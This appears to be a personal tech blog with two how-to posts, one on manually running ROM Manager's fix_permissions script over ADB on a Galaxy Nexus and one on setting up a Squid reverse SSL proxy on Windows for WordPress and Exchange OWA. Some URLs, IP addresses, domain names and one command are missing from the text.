
When you run Fix Perms, the first line (helpfully) prints the script that is being run, which is “/data/data/com.koushikdutta.rommanager/files/fix_permissions”.  Using this info, I attempted to boot into recovery and run the script manually from the ADB shell of my PC.  Again, Fix Perms seemed to stall, only this time I knew it couldn’t be a running app that caused the issue (remember, I’m booted into recovery!).  I issued an

“adb pull /data/data/com.koushikdutta.rommanager/files/fix_permissions”

to get a copy of the Fix Perms script on my computer and checked it out.  It turns out that at the top of the script there is a big warning that states “Warning: if you want to run this script in cm-recovery change the above to #! /sbin/sh”.  Fair enough.  I changed the first line of the script to “#! /sbin/sh” and then pushed the script back to my phone using the following command:

“adb push fix_permissions /data/media”

I pushed the file to the “/data/media” directory instead of the original directory the file came from as that would have overwritten the original and not allowed it to run while Android is booted (not that it’s working anyway…).  NOTE: The “/data/media” directory on the Galaxy Nexus is the virtual SD card (the GN doesn’t have removable media, so it tricks Android into thinking this directory is an SD card).  If you’re using a different phone you’ll likely have to load the script into a different directory.  It shouldn’t make a difference where you place the file, I just wouldn’t put it in the “/data/data” directory.

Once you’ve loaded the script onto your phone, set the proper executable permissions by issuing the command below. Remember to change the file path to wherever you placed the file.

“chmod +x /data/media/fix_permissions”

After that’s done, run the script by issuing:


The script should run and fix your file system permissions without stalling.

Squid Reverse SSL Proxy With Multiple Sites (on Windows)

I’ve been running my Exchange 2010 OWA site on a non-standard port (default is 443) for a while so that I can run SSL for my personal website (you’re reading it) on the standard port.  My server is hosted at home, and I only have 1 public IP, so unless I (re-)installed everything on a single server, I could only have 1 site running on port 443.

This has been fine, up until yesterday, when I attempted to install Exchange 2010 SP2.  The installation kept failing due to some issue with IIS.  I assumed it was due to the fact that I had moved the OWA site from “Default Site Name” to it’s own site on the same server.  To remedy, I removed the OWA, ECP and ActiveSync virtual directories and re-installed them in the default location on my Exchange box.  After doing this, SP2 installed fine.  However, now I am back at my original problem (2 servers needing incoming traffic on port 443).  I could re-do the custom OWA setup, but what a PITA that’d be to do every time an Exchange update comes out (theoretically).

My solution: Squid!  I fought Squid until the wee hours of the morning before calling it quits and going to bed.  This morning I tried my configuration again, and this time I have success.  The goal, of course, was to have Squid running on a local server and receiving all traffic on port 443, and based on the URL of the incoming request, redirect traffic to the proper server.

First thing you need to do is download Squid.  The Windows binary can be obtained from here:  After you download it (it’s a zip file), extract it to c:/squid.  By default, Squid expects to be here, so if you place it somewhere else you’ll have a little bit more work to do.  This is my first experience with Squid, and as such I opted to use the stable release for Windows, which is 2.7, Stable8.  Also, since I’m setting up  a reverse proxy using SSL, I downloaded the SSL support version.

My configuration for squid.conf is below (edited to remove any personal information).  This file needs to be located in the squid/etc directory.  By default, there are example files in there for all config files.  You’ll also need to rename cachemgr.conf.default and mime.conf.default to cachemgr.conf and mime.conf, respectively.  I didn’t edit any settings within those files as I was under the impression that the defaults were fine.  There’s a 4th file in there that doesn’t even need to be configured or renamed for this setup.

The first section here is setting the cache directory (if you opt not to use the default).  Please note: the default location is c:/squid/var/cache, however, if you simply extracted the Squid Windows binary zip to c:/squid, the /var/cache directory does not exist and will cause an error.  Please create that directory (or whatever directory you specify below). Also, ensure that when typing directory paths you use the "/" slash instead of the normal Windows "\" slash.

#Set Cache Directory
cache_dir ufs c:/path/to/cache_dir 100 16 256

This next section is specifying that we want HTTPS to run on port 443 and accelerate (cache) reverse requests. Then it points to the SSL certificate and the corresponding private key. I installed a non-password protected key, as I found that Squid would hang when starting if the key was protected (makes sense). The last part, "vhost", tells Squid that there are multiple sites. I found that without "vhost", my config didn’t work as expected. Also, most documentation I found suggested adding "defaultsite=(url of default site)" to this line. This caused me major headaches, as Squid kept redirecting to the wrong site and I’d get 404 errors when the requested files didn’t exist on the server I was directed to.

#Define Port(s) and Cert(s) (if appropriate)#
https_port 443 accel cert=c:/path/to/cert/cert.crt key=c:/path/to/key/priv.key vhost

Here, we define the sites we are proxying to. "cache_peer" is followed by the internal IP address of the target host. 443 is the port number we’re directing to. "ssl" tells Squid to use SSL. "login=PASS" allows for pass-through authentication (such as when using .htaccess). "name" specifies the name we’ll use to refer to this host within Squid.

#Define Sites#
cache_peer parent 443 0 no-query originserver login=PASS ssl sslflags=DONT_VERIFY_PEER name=wordpress
cache_peer parent 443 0 no-query originserver login=PASS ssl sslflags=DONT_VERIFY_PEER name=exchange

Here we’re configuring some ACLs for our proxy. I chose to add "-acl" to the name of my ACLs just for clarity. The last 2 parts of the first line (and 1 part of the second line) specify the destination URL(s) that the ACL will work for. The last line, "acl all", defines an ACL for all IP addresses. This will be used to deny all traffic access that doesn’t meet our other conditions.

acl wordpress-acl dstdomain
acl exchange-acl dstdomain
acl all src

Here we’re enabling the ACLs (as before we just defined them). "http_access allow" allows traffic using the specified ACL. My "cache_peer_access" statements seem to be saying the same thing as the "http_access" statements, however, this is what I ended up with after tons of trial and error, so I’m leaving it as-is. Those statements may be redundant and only 1 might be necessary. The last line, "never_direct", was only needed for Exchange OWA. If you’re not hosting OWA, you can probably leave that off.

#Enable ACLs#
http_access allow wordpress-acl
cache_peer_access wordpress allow wordpress-acl
http_access allow exchange-acl
cache_peer_access exchange allow exchange-acl
never_direct allow exchange-acl

Here we’re denying all other requests to access our servers behind the proxy

#Deny all others#
cache_peer_access wordpress deny all
cache_peer_access exchange deny all


And that’s it!  Install Squid as a service (if you haven’t done so already), by using the “squid.exe –i” command.  The squid.exe file is in the squid/sbin/ directory.  If you unzipped Squid to any other directory than c:/squid, you’ll need to add another switch (I think it’s “-f”) to the install command to specify the location of everything.  Documentation for the Windows binary can be found here:

Please make sure that there are no port conflicts on the host running Squid.  I found that when another program was running on port 443 Squid would hang when started from the Services console.  Also, make sure that you have the necessary firewall ports open.  Then start Squid from the Services console.

Now verify that everything’s working properly.  Squid will create a log file in the same directory as the squid.exe file if there are any errors upon initialization.  After that, logs will be created in the squid/var/logs directory.